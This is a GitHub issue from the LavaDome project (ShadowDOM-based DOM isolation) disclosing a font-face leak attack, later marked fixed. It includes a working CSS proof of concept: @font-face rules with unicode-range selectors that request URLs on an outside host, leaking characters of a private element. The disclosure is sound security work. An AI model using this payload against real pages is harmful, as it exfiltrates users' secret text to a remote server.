search

LavaMoat / LavaDome

Secure DOM trees isolation and encapsulation leveraging ShadowDOM
https://lavamoat.github.io/LavaDome/packages/core/demo/
MIT License
16 stars 3 forks source link

LavaDome is vulnerable to font-face based leak attack #16

Closed weizman closed 6 months ago

weizman commented 6 months ago

Based on @masatokinugawa's research (introduced to me by @mhofman), the following attack can exfiltrate relevant chars of the secret (with order most of the time) to a remote server when added to the demo app:

<style>
    @font-face{
        font-family:attack;
        src:url('//l0.cm/?Found:A');
        unicode-range:U+0041;
    }
    @font-face{
        font-family:attack;
        src:url('//l0.cm/?Found:B');
        unicode-range:U+0042;
    }
    @font-face{
        font-family:attack;
        src:url('//l0.cm/?Found:C');
        unicode-range:U+0043;
    }
    #PRIVATE{
        font-family:attack;
    }
</style>
weizman commented 6 months ago

fixed #17